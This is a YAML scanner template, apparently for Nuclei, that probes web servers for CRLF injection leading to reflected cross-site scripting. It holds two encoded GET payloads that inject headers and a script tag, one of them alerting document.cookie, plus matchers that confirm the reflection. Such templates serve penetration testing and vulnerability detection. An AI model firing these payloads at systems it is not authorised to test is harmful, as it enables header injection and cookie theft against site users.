id: blackfun-crlf-to-xss

info:
  name: crlf-xss-in-path
  author: reewardius
  severity: medium
  reference:
    - https://book.hacktricks.xyz/pentesting-web/crlf-0d-0a
    - https://medium.com/@a7med.ctf/crlf-to-xss-8059ceefd349
    - https://secinthemid.com/vulnerabilities/crlf-injection-attack/
    - https://infosecwriteups.com/6000-with-microsoft-hall-of-fame-microsoft-firewall-bypass-crlf-to-xss-microsoft-bug-bounty-8f6615c47922
  tags: crlf

http:
  - method: GET
    path:
      - '{{BaseURL}}/%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(1)%3c/script%3e%2F..%2F..%2F..%2F../tr'
      - '{{BaseURL}}/%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr'
      
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(1)</script>'
          - '<script>alert(document.cookie)</script>'
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: word
        part: body
        words:
          - 'Bad Request'
        negative: true